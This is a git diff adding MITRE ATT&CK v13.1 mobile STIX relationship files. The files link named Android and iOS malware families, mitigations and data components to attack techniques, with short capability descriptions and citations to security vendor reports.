b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8.json new file mode 100644 index 0000000000000000000000000000000000000000..96dc99ccab907e1b8be3f2681cc25a5cb13774a0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dd100834-eac2-4130-b0d6-c5cb87001d61", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8", + "created": "2019-11-21T16:42:48.437Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:18.013Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect SMS messages.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71.json new file mode 100644 index 0000000000000000000000000000000000000000..dd9f82123a4f18ccbdda3977824642aeaad9373f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ba3f407d-f4ab-4b76-9412-af94cbd2109f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71", + "created": "2022-04-18T15:49:00.561Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can download text files with commands from an FTP server and exfiltrate data via email.(Citation: SecureList BusyGasper)", + "modified": "2022-04-18T15:49:00.561Z", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04530307-22d8-4a06-9056-55eea225fabb.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04530307-22d8-4a06-9056-55eea225fabb.json new file mode 100644 index 0000000000000000000000000000000000000000..7758d89a95fe7a0f6980894230e20fa65c272ada --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04530307-22d8-4a06-9056-55eea225fabb.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--e56f2a06-1106-446c-bd87-c5db2dbc53b1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04530307-22d8-4a06-9056-55eea225fabb", + "type": "relationship", + "created": "2019-07-10T15:35:43.710Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.842Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) retrieves messages and decryption keys for popular messaging applications and other accounts stored on the device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--046acda0-91de-4385-bcfb-157570d8e51d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--046acda0-91de-4385-bcfb-157570d8e51d.json new file mode 100644 index 0000000000000000000000000000000000000000..6ba46277d8586e7b6056968b511902cb18362ddb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--046acda0-91de-4385-bcfb-157570d8e51d.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--64a243f6-e88f-4134-9b3e-9d7339b08168", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--046acda0-91de-4385-bcfb-157570d8e51d", + "created": "2023-03-30T15:25:00.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:26:46.611Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can search for installed applications that match a list of targets.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049a5149-00c9-492a-8ffb-463f3d0cd910.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049a5149-00c9-492a-8ffb-463f3d0cd910.json new file mode 100644 index 0000000000000000000000000000000000000000..a744d6ce83daec2465756d2b5aebd8b9c69f9b8d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049a5149-00c9-492a-8ffb-463f3d0cd910.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--3cf8e3e8-7f29-4669-9357-f38537838740", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049a5149-00c9-492a-8ffb-463f3d0cd910", + "created": "2022-03-30T20:13:28.442Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022." + }, + { + "source_name": "LauncherApps getActivityList", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes to prevent malicious applications from fully suppressing their icon in the launcher.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "modified": "2022-05-20T17:16:08.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049b0c71-63e3-47ce-bb0b-149df0344b15.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049b0c71-63e3-47ce-bb0b-149df0344b15.json new file mode 100644 index 0000000000000000000000000000000000000000..31796eaf9087c8a6744dc35212c89d6c0c3510cf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049b0c71-63e3-47ce-bb0b-149df0344b15.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--2b37c5b4-0503-4d43-b195-a0e229546cfb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--049b0c71-63e3-47ce-bb0b-149df0344b15", + "created": "2020-12-24T21:45:56.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:59.861Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access device contacts.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049c39ab-c036-457a-9b8f-4318416658b8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049c39ab-c036-457a-9b8f-4318416658b8.json new file mode 100644 index 0000000000000000000000000000000000000000..753d334e68028cda514190dfe9fc5838b0709544 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049c39ab-c036-457a-9b8f-4318416658b8.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c08975ba-a60f-411f-952a-fb6dc0f99953", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049c39ab-c036-457a-9b8f-4318416658b8", + "created": "2022-03-30T19:54:24.468Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "A locked bootloader could prevent unauthorized modifications of protected operating system files. ", + "modified": "2022-03-30T19:55:15.724Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112.json new file mode 100644 index 0000000000000000000000000000000000000000..e8b1516bed7eff27fbf14a0008dbed4ad0625814 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2ace3362-3f72-418e-995d-cd96cc326ba6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112", + "created": "2022-04-05T19:59:03.285Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:59:03.285Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "target_ref": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc.json new file mode 100644 index 0000000000000000000000000000000000000000..f4fa98fb3795e7a012eebfeef96f50dfb7975ee4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--53435d78-83d2-4db9-8b07-ac740f111868", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc", + "created": "2023-03-20T18:37:57.767Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:37:57.767Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe.json new file mode 100644 index 0000000000000000000000000000000000000000..74f2c160788566439f6a4236c3f44eebe59e010d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--a7241d18-a529-4e82-827b-314cdcc2b386", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe", + "type": "relationship", + "created": "2019-12-10T16:07:41.093Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2019-12-10T16:07:41.093Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can download code and binaries from the C2 server to execute on the device as root.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05563777-5771-4bd6-a1af-3e244cf42372.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05563777-5771-4bd6-a1af-3e244cf42372.json new file mode 100644 index 0000000000000000000000000000000000000000..3d5483156e7e4374f4c811e7db0a561ce7a585ce --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05563777-5771-4bd6-a1af-3e244cf42372.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--4b7b6615-a2b1-447f-a800-30825c31aa8b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--05563777-5771-4bd6-a1af-3e244cf42372", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Most [KeyRaider](https://attack.mitre.org/software/S0288) samples search to find the Apple account's username, password and device's GUID in data being transferred.(Citation: Xiao-KeyRaider)", + "relationship_type": "uses", + "source_ref": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef.json new file mode 100644 index 0000000000000000000000000000000000000000..f547285472479beeefea9d37e14501231f319d2a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--60fb0e40-a9cd-407d-8b36-6ac70f5ace90", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:32.033Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76.json new file mode 100644 index 0000000000000000000000000000000000000000..c90ab1f0762639103e8c6a4d9f43d06e715408ed --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a9ef43ea-b205-4e44-8cdf-0c474527bbe1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76", + "created": "2020-12-17T20:15:22.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:35:41.700Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has collected all outgoing phone numbers that start with \u201c86\u201d.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--06348e22-9a06-4e4c-a57c-e438462e7fce.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--06348e22-9a06-4e4c-a57c-e438462e7fce.json new file mode 100644 index 0000000000000000000000000000000000000000..f76192f01eb9e25eb3ee87edb8f4440ea26eb64e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--06348e22-9a06-4e4c-a57c-e438462e7fce.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ed18ae1d-2d17-49cb-aa60-c1c8af7cdd7b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--06348e22-9a06-4e4c-a57c-e438462e7fce", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.173Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can record audio via the microphone when an infected device is in a specified location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--069b2328-442b-491e-962d-d3fe01f0549e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--069b2328-442b-491e-962d-d3fe01f0549e.json new file mode 100644 index 0000000000000000000000000000000000000000..10a96d8659e1ce920f1f58c77a0239e9be1ba9cf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--069b2328-442b-491e-962d-d3fe01f0549e.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1cacf883-68c7-44df-ac68-8ba09e0c99bd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--069b2328-442b-491e-962d-d3fe01f0549e", + "created": "2019-09-04T14:28:15.479Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Monokle](https://attack.mitre.org/software/S0407) can be controlled via email and SMS from a set of \"control phones.\"(Citation: Lookout-Monokle)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85.json new file mode 100644 index 0000000000000000000000000000000000000000..72375a3e0be20359368045fb7ef210970db30965 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--53a8b3c9-4691-4d22-974d-689553037717", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85", + "type": "relationship", + "created": "2020-11-20T16:37:28.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.547Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect various pieces of device information, such as serial number and product information.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0727ac06-5b46-4f79-abe9-63c1b923d383.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0727ac06-5b46-4f79-abe9-63c1b923d383.json new file mode 100644 index 0000000000000000000000000000000000000000..4131826d243601a3ae347474106d8e5bcda1116d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0727ac06-5b46-4f79-abe9-63c1b923d383.json 
